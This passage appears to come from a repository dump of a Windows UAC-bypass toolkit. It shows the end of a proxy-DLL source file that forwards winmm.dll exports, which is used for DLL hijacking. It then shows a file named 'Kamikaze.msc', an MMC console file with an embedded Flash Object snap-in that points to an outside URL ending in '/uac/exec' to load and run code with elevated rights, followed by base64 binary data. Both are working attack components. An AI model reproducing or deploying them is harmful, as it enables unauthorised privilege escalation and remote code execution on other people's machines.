/EXPORT:midiStreamClose=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiStreamClose\")\n#pragma comment(linker, \" /EXPORT:midiStreamOpen=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiStreamOpen\")\n#pragma comment(linker, \" /EXPORT:midiStreamOut=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiStreamOut\")\n#pragma comment(linker, \" /EXPORT:midiStreamPause=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiStreamPause\")\n#pragma comment(linker, \" /EXPORT:midiStreamPosition=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiStreamPosition\")\n#pragma comment(linker, \" /EXPORT:midiStreamProperty=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiStreamProperty\")\n#pragma comment(linker, \" /EXPORT:midiStreamRestart=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.midiStreamRestart\")\n#pragma comment(linker, \" /EXPORT:mixerGetControlDetailsW=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.mixerGetControlDetailsW\")\n#pragma comment(linker, \" /EXPORT:mixerGetDevCapsW=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.mixerGetDevCapsW\")\n#pragma comment(linker, \" /EXPORT:mixerGetLineControlsW=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.mixerGetLineControlsW\")\n#pragma comment(linker, \" /EXPORT:mixerGetLineInfoW=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.mixerGetLineInfoW\")\n#pragma comment(linker, \" /EXPORT:mixerGetNumDevs=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.mixerGetNumDevs\")\n#pragma comment(linker, \" /EXPORT:mixerSetControlDetails=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.mixerSetControlDetails\")\n#pragma comment(linker, \" /EXPORT:PlaySoundW=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.PlaySoundW\")\n#pragma comment(linker, \" /EXPORT:timeGetDevCaps=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.timeGetDevCaps\")\n#pragma comment(linker, \" 
/EXPORT:timeGetTime=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.timeGetTime\")\n#pragma comment(linker, \" /EXPORT:timeKillEvent=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.timeKillEvent\")\n#pragma comment(linker, \" /EXPORT:timeSetEvent=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.timeSetEvent\")\n#pragma comment(linker, \" /EXPORT:waveInMessage=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveInMessage\")\n#pragma comment(linker, \" /EXPORT:waveOutClose=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutClose\")\n#pragma comment(linker, \" /EXPORT:waveOutGetDevCapsW=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutGetDevCapsW\")\n#pragma comment(linker, \" /EXPORT:waveOutGetErrorTextW=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutGetErrorTextW\")\n#pragma comment(linker, \" /EXPORT:waveOutGetPosition=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutGetPosition\")\n#pragma comment(linker, \" /EXPORT:waveOutGetVolume=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutGetVolume\")\n#pragma comment(linker, \" /EXPORT:waveOutMessage=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutMessage\")\n#pragma comment(linker, \" /EXPORT:waveOutOpen=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutOpen\")\n#pragma comment(linker, \" /EXPORT:waveOutPause=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutPause\")\n#pragma comment(linker, \" /EXPORT:waveOutPrepareHeader=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutPrepareHeader\")\n#pragma comment(linker, \" /EXPORT:waveOutReset=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutReset\")\n#pragma comment(linker, \" /EXPORT:waveOutRestart=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutRestart\")\n#pragma comment(linker, \" 
/EXPORT:waveOutSetVolume=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutSetVolume\")\n#pragma comment(linker, \" /EXPORT:waveOutUnprepareHeader=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutUnprepareHeader\")\n#pragma comment(linker, \" /EXPORT:waveOutWrite=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\winmm.waveOutWrite\")\n"
  },
  {
    "path": "Source/Kamikaze/Kamikaze.msc",
    "content": "<?xml version=\"1.0\"?><MMC_ConsoleFile ConsoleVersion=\"3.0\" ProgramMode=\"Author\">\n  <ConsoleFileID>{D0918FB2-FDF5-4A21-A323-32DC7F4D67FE}</ConsoleFileID>\n  <FrameState ShowStatusBar=\"true\">\n    <WindowPlacement ShowCommand=\"SW_SHOWNORMAL\">\n      <Point Name=\"MinPosition\" X=\"-1\" Y=\"-1\"/>\n      <Point Name=\"MaxPosition\" X=\"-1\" Y=\"-1\"/>\n      <Rectangle Name=\"NormalPosition\" Top=\"180\" Bottom=\"939\" Left=\"105\" Right=\"1545\"/>\n    </WindowPlacement>\n  </FrameState>\n  <Views>\n    <View ID=\"1\" ScopePaneWidth=\"292\" ActionsPaneWidth=\"-1\">\n      <BookMark Name=\"RootNode\" NodeID=\"1\"/>\n      <BookMark Name=\"SelectedNode\" NodeID=\"2\"/>\n      <WindowPlacement WPF_RESTORETOMAXIMIZED=\"true\" ShowCommand=\"SW_SHOWMAXIMIZED\">\n        <Point Name=\"MinPosition\" X=\"-1\" Y=\"-1\"/>\n        <Point Name=\"MaxPosition\" X=\"-8\" Y=\"-31\"/>\n        <Rectangle Name=\"NormalPosition\" Top=\"0\" Bottom=\"436\" Left=\"0\" Right=\"1186\"/>\n      </WindowPlacement>\n      <ViewOptions ViewMode=\"Report\" ScopePaneVisible=\"true\" ActionsPaneVisible=\"true\" DescriptionBarVisible=\"false\" DefaultColumn0Width=\"200\" DefaultColumn1Width=\"0\"/>\n    </View>\n  </Views>\n  <VisualAttributes/>\n  <Favorites>\n    <Favorite TYPE=\"Group\">\n      <String Name=\"Name\" ID=\"1\"/>\n      <Favorites/>\n    </Favorite>\n  </Favorites>\n  <ScopeTree>\n    <SnapinCache>\n      <Snapin CLSID=\"{C96401CC-0E17-11D3-885B-00C04F72C717}\" AllExtensionsEnabled=\"true\"/>\n      <Snapin CLSID=\"{C96401CF-0E17-11D3-885B-00C04F72C717}\" AllExtensionsEnabled=\"true\"/>\n    </SnapinCache>\n    <Nodes>\n      <Node ID=\"1\" ImageIdx=\"0\" CLSID=\"{C96401CC-0E17-11D3-885B-00C04F72C717}\" Preload=\"true\">\n        <Nodes>\n          <Node ID=\"2\" ImageIdx=\"0\" CLSID=\"{C96401CF-0E17-11D3-885B-00C04F72C717}\" Preload=\"true\">\n            <Nodes/>\n            <String Name=\"Name\" ID=\"2\"/>\n            <Bitmaps>\n              
<BinaryData Name=\"Small\" BinaryRefIndex=\"0\"/>\n              <BinaryData Name=\"Large\" BinaryRefIndex=\"1\"/>\n            </Bitmaps>\n            <ComponentDatas>\n              <ComponentData>\n                <GUID Name=\"Snapin\">{C96401CF-0E17-11D3-885B-00C04F72C717}</GUID>\n                <Stream BinaryRefIndex=\"2\"/>\n              </ComponentData>\n            </ComponentDatas>\n            <Components>\n              <Component ViewID=\"1\">\n                <GUID Name=\"Snapin\">{C96401CF-0E17-11D3-885B-00C04F72C717}</GUID>\n                <Storage BinaryRefIndex=\"3\"/>\n              </Component>\n            </Components>\n          </Node>\n        </Nodes>\n        <String Name=\"Name\" ID=\"4\"/>\n        <Bitmaps>\n          <BinaryData Name=\"Small\" BinaryRefIndex=\"4\"/>\n          <BinaryData Name=\"Large\" BinaryRefIndex=\"5\"/>\n        </Bitmaps>\n        <ComponentDatas>\n          <ComponentData>\n            <GUID Name=\"Snapin\">{C96401CC-0E17-11D3-885B-00C04F72C717}</GUID>\n            <Stream BinaryRefIndex=\"6\"/>\n          </ComponentData>\n        </ComponentDatas>\n        <Components/>\n      </Node>\n    </Nodes>\n  </ScopeTree>\n  <ConsoleTaskpads/>\n  <ViewSettingsCache>\n    <TargetView ViewID=\"1\" NodeTypeGUID=\"{C96401CE-0E17-11D3-885B-00C04F72C717}\"/>\n    <ViewSettings Flag_TaskPadID=\"true\" Age=\"2\">\n      <GUID>{00000000-0000-0000-0000-000000000000}</GUID>\n    </ViewSettings>\n    <TargetView ViewID=\"1\" NodeTypeGUID=\"{C96401D0-0E17-11D3-885B-00C04F72C717}\"/>\n    <ViewSettings Flag_TaskPadID=\"true\" Age=\"1\">\n      <GUID>{00000000-0000-0000-0000-000000000000}</GUID>\n    </ViewSettings>\n  </ViewSettingsCache>\n  <ColumnSettingsCache/>\n  <StringTables>\n    <IdentifierPool AbsoluteMin=\"1\" AbsoluteMax=\"65535\" NextAvailable=\"5\"/>\n    <StringTable>\n      <GUID>{71E5B33E-1064-11D2-808F-0000F875A9CE}</GUID>\n      <Strings>\n        <String ID=\"1\" Refs=\"1\">Favorites</String>\n        <String 
ID=\"2\" Refs=\"2\">Shockwave Flash Object</String>\n        <String ID=\"3\" Refs=\"1\">https://hfiref0x.github.io/Beacon/uac/exec</String>\n        <String ID=\"4\" Refs=\"2\">Console Root</String>\n      </Strings>\n    </StringTable>\n  </StringTables>\n  <BinaryStorage>\n    <Binary>\n    </Binary>\n    <Binary>\n
AAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAoKCg9WVlaAl5eX2pGRkdpNTU2ACAgIDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCTT4AAAAA\nAAAAPgAAACgAAACAAAAAIAAAAAEAAQAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////AAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAA==\n    </Binary>\n    <Binary>\nAQAAABQAAAAAAAAAAgAAAAMAAAA=\n    </Binary>\n    
<Binary>\n0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgADAP7/CQAGAAAAAAAAAAAAAAABAAAAAQAAAAAAAAAA\nEAAAAgAAAAEAAAD+////AAAAAAAAAAD/////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n///////////////////////////////////////////////////////////////////////////9\n/////v////7////+////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n/////////////////////////////////////////////////////////////////////////1IA\nbwBvAHQAIABFAG4AdAByAHkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAWAAUA//////////8BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFDbnca++tIB\nAwAAAIABAAAAAAAAbwBjAHgAXwBzAHQAcgBlAGEAbQBvAHIAcwB0AG8AcgBhAGcAZQAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAACgAAgH///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAARgEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP///////////////wAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA////////\n////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAA\nAAIAAAADAAAABAAAAAUAAAD+////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n////////////////////////////////////////////////////////////////////////////\n//////////////////////////////////////////////////////////////////////9nVWZV\nAA4AAMhVAABAQgAACAACAAAAAAAIAAAAAAAIAAAAAAAIAA4AAABXAGkAbgBkAG8AdwAAAAgABgAA\nAC0AMQAAAAgABgAAAC0AMQAAAAgACgAAAEgAaQBnAGgAAAAIAAIAAAAAAAgABgAAAC0AMQAAAAgA\nAAAAAAgAAgAAAAAACAAQAAAAUwBoAG8AdwBBAGwAbAAAAAgABAAAADAAAAAIAAQAAAAwAAAACAAC\nAAAAAAAIAAAAAAAIAAIAAAAAAA0AAAAAAAAAAAAAAAAAAAAAAAgABAAAADEAAAAIAAQAAAAwAAAA\nCAAAAAAACAAEAAAAMAAAAAgACAAAAGEAbABsAAAACAAMAAAAZgBhAGwAcwBlAAAACAAMAAAAZgBh\nAGwAcwBlAAAACAAEAAAAMAAAAAgADAAAAHMAYwBhAGwAZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==\n    </Binary>\n    
<Binary>\nSUwBAQIABAAMABAAEAD/////IRD//////////0JNNgAAAAAAAAA2AAAAKAAAAEAAAAAQAAAAAQAg\nAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGajvf9mo73/ZqO9/2ajvf9mo73/Y6C6/2Cctv9c\nmLH/V5Os/1KOpv9NiKD/SIOb/0R/lv9Be5L/AAAAAAAAAABmo73/ZqO9/2ajvf9mo73/ZqO9/2Og\nuv9gnLb/XJix/1eTrP9Sjqb/TYig/0iDm/9Ef5b/QXuS/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB6\nssr/j+L5/4LQ8f+C0PH/gtDx/4PR8v+D0fL/g9Hy/4LQ8f+C0PH/gdDw/4HQ8P+C0PD/XJm1/wAA\nAAAAAAAAerLK/4/i+f+C0PH/gtDx/4LQ8f+D0fL/g9Hy/4PR8v+C0PH/gtDx/4HQ8P+B0PD/gtDw\n/1yZtf8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAe7TM/5Pl+v+D0vP/g9Lz/4PR8v+E0/T/hdP0/4TT\n9P+E0fL/g9Hy/4PR8v+D0fL/g9Ly/2Cduv8AAAAAAAAAAHu0zP+T5fr/g9Lz/4PS8/+D0fL/hNP0\n/4XT9P+E0/T/hNHy/4PR8v+D0fL/g9Hy/4PS8v9gnbr/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHy2\nz/+Z6Pv/hdX2/4bV9/+F1Pb/htX3/4fW+P+G1vj/htT1/4XT9f+E0/X/hNT1/4XV9P9gnbr/AAAA\nAAAAAAB8ts//mej7/4XV9v+G1ff/hdT2/4bV9/+H
1vj/htb4/4bU9f+F0/X/hNP1/4TU9f+F1fT/\nYJ26/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB+udL/nur8/4fZ+v+H2fr/h9j5/4jZ+v+J2vv/idn8\n/4bY+f+H1/j/h9f4/4bX+P+H1/X/YJ26/wAAAAAAAAAAfrnS/57q/P+H2fr/h9n6/4fY+f+I2fr/\nidr7/4nZ/P+G2Pn/h9f4/4fX+P+G1/j/h9f1/2Cduv8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgL3V\n/6Tu/v+J3f7/itz+/4rc/f+J2/3/itz9/4vc/f+J2vv/iNr7/4ja+v+I2fr/h9j1/2Cduv8AAAAA\nAAAAAIC91f+k7v7/id3+/4rc/v+K3P3/idv9/4rc/f+L3P3/idr7/4ja+/+I2vr/iNn6/4fY9f9g\nnbr/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAILA2P+q8P7/jOD//4zf//+M4P//jeD//43g//+N4P//\njN/+/4ve/v+L3v3/i979/4jZ9P9gnbr/AAAAAAAAAACCwNj/qvD+/4zg//+M3///jOD//43g//+N\n4P//jeD//4zf/v+L3v7/i979/4ve/f+I2fT/YJ26/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACEw9v/\nr/H//47i//+O4v//juL//4/k//+O4///juL//47j//+O4v//juL//4zg//+I2fP/YJ26/wAAAAAA\nAAAAhMPb/6/x//+O4v//juL//47i//+P5P//juP//47i//+O4///juL//47i//+M4P//iNnz/2Cd\nuv8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAhsfe/7Py//+Q5f//kOT//5Dl//+T6f//k+n//67w//+u\n8P//rvD//67w//+u8P//rvD//2Cduv8AAAAAAAAAAIbH3v+z8v//kOX//5Dk//+Q5f//k+n//5Pp\n//+u8P//rvD//67w//+u8P//rvD//67w//9gnbr/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIfJ4f+2\n8///keX//5Hl
//+S6P//k+n//7bz//9XlK//YJ26/2yqxP9sqsT/bKrE/2yqxP95utT/AAAAAAAA\nAACHyeH/tvP//5Hl//+R5f//kuj//5Pp//+28///V5Sv/2Cduv9sqsT/bKrE/2yqxP9sqsT/ebrU\n/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB7wNr/id73/7bz//+28///tvP//7bz//9gnbr/g9Dw/4PQ\n8P+D0PD/g9Dw/4PQ8P+D0PD/ebrU/wAAAAAAAAAAe8Da/4ne9/+28///tvP//7bz//+28///YJ26\n/4PQ8P+D0PD/g9Dw/4PQ8P+D0PD/g9Dw/3m61P8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGC46Rmqq\nxP9qqsT/aqrE/2qqxP9qqsT/db7e/5zZ8f////////////+tev/OoUf/nNnx/3m61P8AAAAAAAAA\nABguOkZqqsT/aqrE/2qqxP9qqsT/aqrE/3W+3v+c2fH/////////////rXr/zqFH/5zZ8f95utT/\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADZjeHlot9v/aLfb\n/2i32/9ot9v/aLfb/2e12v8rUGFiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2Y3h5\naLfb/2i32/9ot9v/aLfb/2i32/9ntdr/K1BhYgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAABCTT4AAAAAAAAAPgAAACgAAABAAAAAEAAAAAEAAQAAAAAAgAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAA////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
